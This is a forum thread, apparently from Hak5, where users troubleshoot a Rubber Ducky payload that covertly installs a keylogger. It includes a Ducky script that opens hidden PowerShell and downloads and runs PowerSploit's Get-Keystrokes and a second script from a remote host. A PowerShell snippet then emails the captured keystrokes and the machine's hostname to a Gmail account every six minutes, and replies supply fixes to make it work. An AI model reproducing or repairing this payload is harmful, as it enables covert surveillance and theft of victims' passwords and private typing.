Hak5 Forums

Just guessing but the issue might be on this line.  I don't use smtpclient in Powershell but instead use send-mailmessage.

But...the issue with the smtpclient in the script may be this and the correction that may need to happen.

while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

should be maybe???

while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

The attachment of the mailmessage object takes an attachment object.

Edited by PoSHMagiC0de
forgot extra parenthesis.


Hey, my problem is that things like //:https are written in PowerShell like ähttpsÖ

Any ideas how to fix this?

On 4/27/2018 at 4:16 AM, PoSHMagiC0de said:

Just guessing but the issue might be on this line.  I don't use smtpclient in Powershell but instead use send-mailmessage.

But...the issue with the smtpclient in the script may be this and the correction that may need to happen.


while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.txt");$SMTPInfo.Send($ReportEmail);sleep 360}

should be maybe???

while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

The attachment of the mailmessage object takes an attachment object.

Hey, thanks for the reply. I tried to modify the mail.ps1 with


while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$ENV:temp\key.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

I'm still getting the same issue... empty emails. I can't solve this problem.


Last thing I would try is see if the original keylogger script is actually working and creating a log file at that location. Wherever $env:temp points to. If you type that out in powershell it will tell you. Look for the key.txt while just running the keylogger. If a file shows up and holds data then something is up with the emailer. If you get no key.txt or no stuff in it then the keylogger is not logging.

31 minutes ago, PoSHMagiC0de said:

Last thing I would try is see if the original keylogger script is actually working and creating a log file at that location. Wherever $env:temp points to. If you type that out in powershell it will tell you. Look for the key.txt while just running the keylogger. If a file shows up and holds data then something is up with the emailer. If you get no key.txt or no stuff in it then the keylogger is not logging.

Nope, I had a look in %temp% and there is no log.txt created.

Tried both scripts, same issue. Getting empty mails.


https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1

https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1


Sorry, just the Get-Keystrokes.ps1 script.  Download it locally if you have to.

 

By default, if run on its own with no parameters, it should create a key.log in the temp folder. The line below in the payload.txt changes that to key.txt if run with it.

STRING Get-Keystrokes -LogPath $env:temp\key.txt

So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log.  The test should look like below:

run powershell and then run each line.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

#For Default path.
Get-Keystrokes

#To place it on your desktop do and look for keylog.txt to popup.
Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)

It runs in a runspace so PS will return once it starts running.  You can add the param -PassThru to get a copy of the runspace to look at too.  With that you can stop it or closing the Powershell window will do the same I believe.  I have to test.

I do not have my test machine up to test so going off of what I read inside all the scripts.

Might want to check your AV too. The keylogger comes from PowerSploit, which is known by the AV authors, so it might be getting blocked.

19 minutes ago, PoSHMagiC0de said:

Sorry, just the Get-Keystrokes.ps1 script.  Download it locally if you have to.

 

By default, if run on its own with no parameters, it should create a key.log in the temp folder. The line below in the payload.txt changes that to key.txt if run with it.


STRING Get-Keystrokes -LogPath $env:temp\key.txt

So, if you run the line above it and then just run "Get-Keystrokes", it should fire off the actual keylogger and create that key.log.  The test should look like below:

run powershell and then run each line.


IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

#For Default path.
Get-Keystrokes

#To place it on your desktop do and look for keylog.txt to popup.
Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)

It runs in a runspace so PS will return once it starts running.  You can add the param -PassThru to get a copy of the runspace to look at too.  With that you can stop it or closing the Powershell window will do the same I believe.  I have to test.

I do not have my test machine up to test so going off of what I read inside all the scripts.

Might want to check your AV too. The keylogger comes from PowerSploit, which is known by the AV authors, so it might be getting blocked.


Thanks, so if I got it right the script should look like this. I'm going to try in a sec.

So if I followed you right the script should look like this:

DELAY 2000
GUI r
DELAY 500
STRING powershell -WindowStyle hidden
ENTER
DELAY 1500
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
ENTER
DELAY 400
STRING Get-Keystrokes -LogPath ($env:userprofile\Desktop\keylog.txt)
ENTER
DELAY 200
GUI r
DELAY 300
STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://xxxx.pe.hu/keylogger/mail.ps1')
ENTER

 

$SMTPServer = 'smtp.gmail.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('xxxx@gmail.com', 'password')
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'xxxx@gmail.com'
$ReportEmail.To.Add('xxxx@gmail.com')
$ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName
while(1){$ReportEmail.Attachments.Add((new-object "System.Net.Mail.Attachment"("$env:userprofile\Desktop\keylog.txt")));$SMTPInfo.Send($ReportEmail);sleep 360}

Edited by mrskannk


Nope, what I am doing here is helping you troubleshoot the payload so first take the Rubber Ducky or Bash Bunny and put it in the drawer.  Ignore it for now.  What you are going to have to do is verify the payload works without the RD or BB.  If it doesn't work without it on your test machine then it definitely will not work being launched from the device.

So, above I was trying to have you just jump on your test machine.  Run powershell and just use the two line commands I put out.

The first will download and launch get-keystrokes function to memory for use. Second and third was to run the get-keystrokes as default which should write the key.log file to your temp folder on your machine or use the second get-keystrokes command with a path to have it write to your desktop so you know where it should be. I would do the second one so if it works you should get a key.txt right on your desktop that should start populating with keystrokes. If you get nothing, something is wrong but at least you may get an error message if it does. If get-keystrokes doesn't run (which is the actual keylogger) then you will get nothing in email. So, ignore the RD for now until you know the scripts work.

 

Now if it does then try and run the payload by hand.  That means playing out by hand what the payload does to see if everything works.  
